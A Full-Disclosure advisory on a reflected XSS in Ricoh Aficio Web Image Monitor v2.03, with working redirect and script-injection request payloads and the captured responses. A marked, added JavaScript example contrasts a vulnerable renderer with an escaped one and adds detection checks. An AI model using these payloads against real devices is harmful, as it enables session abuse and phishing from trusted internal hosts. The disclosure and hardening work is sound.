
[Full-disclosure] Reflected XSS in Ricoh Aficio Web Image Monitor v2.03



I was poking at some Ricoh MFPs several days ago when I found this. It is
nothing to get too terribly excited about, as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:


Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are HTML
encoded for your protection.

Fun with Redirects:

My initial test was just an abuse of the redirect functionality that is being
exploited for the vector.

GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";;
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>



A more traditional XSS test will still work just as well, of course:


Traditional Test:

GET /?--></script><script>alert(51494)</script> HTTP/1.1

HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
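Both captured responses show the same root cause: the raw query string is concatenated into a double-quoted JavaScript string literal inside an inline script, so a quote closes the literal (the redirect test) and a closing script tag ends the whole script element (the traditional test). The following is an added example of mine, not Ricoh's firmware code and not from the original post: it reconstructs the jumpPage() template from the responses above, renders it the vulnerable way and then with proper JavaScript-string encoding, and includes two checks a defender can run against a fetched response. The template constants, the function names (renderJumpPageVulnerable, renderJumpPageHardened, jsStringLiteral, countScriptTags, firstHrefLiteral) and the check helpers are assumptions for illustration; the device's real CGI source is not on the page.

```javascript
// Added example, not Ricoh's code: the jumpPage() template is reconstructed
// from the two captured responses; function names and helpers are my own.
const PREFIX = '/web/guest/en/websys/webArch/mainFrame.cgi?';
const HEAD = '<script language="javascript">\n<!--\nfunction jumpPage(){\n' +
  'self.document.cookie="cookieOnOffChecker=on; path=/";\n';
const TAIL = '\n}\n// -->\n</script>';

// Vulnerable form: the raw query string is concatenated straight into a
// double-quoted JS string literal, exactly as the captured responses show.
function renderJumpPageVulnerable(query) {
  return HEAD + 'location.href="' + PREFIX + query + '";' + TAIL;
}

// Encode a value for a double-quoted JS string literal that sits inside an
// inline <script>. JSON.stringify escapes quotes, backslashes and control
// characters; the extra replacements cover the characters that can still end
// the <script> element or the HTML comment, plus the two line terminators
// that JSON leaves unescaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened form: same page, but the literal is built by the encoder above, so
// the reflected text can no longer close the string or the <script> tag.
function renderJumpPageHardened(query) {
  return HEAD + 'location.href=' + jsStringLiteral(PREFIX + query) + ';' + TAIL;
}

// Check 1: number of <script ...> / </script> tags in the markup.
// A well-formed jumpPage() page has exactly two.
function countScriptTags(html) {
  return (html.match(/<\/?script/gi) || []).length;
}

// Check 2: the first literal assigned to location.href, decoded the way a JS
// engine would decode it. For the hardened page this round-trips to the
// intended URL; for the vulnerable page the literal ends at the injected
// quote and whatever follows is left to run as code.
function firstHrefLiteral(html) {
  const m = /location\.href="((?:[^"\\]|\\.)*)"/.exec(html);
  return m ? JSON.parse('"' + m[1] + '"') : null;
}

// Constructed inputs: the two request strings from the advisory.
const REDIRECT_PAYLOAD = '";location.href="http://cosine-security.blogspot.com';
const TRADITIONAL_PAYLOAD = '--></script><script>alert(51494)</script>';

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of [REDIRECT_PAYLOAD, TRADITIONAL_PAYLOAD]) {
    const v = renderJumpPageVulnerable(p);
    const h = renderJumpPageHardened(p);
    console.log('vulnerable: script tags =', countScriptTags(v),
                '| href literal =', firstHrefLiteral(v));
    console.log('hardened:   script tags =', countScriptTags(h),
                '| href literal =', firstHrefLiteral(h));
  }
}
```

Run with `node` to see the two checks side by side. The encoder is the fix that matters here: once the literal is correctly escaped, the reflected text is just part of the URL the page navigates to, and the count check gives a cheap regression test for any response that embeds request data in a script block.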


The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/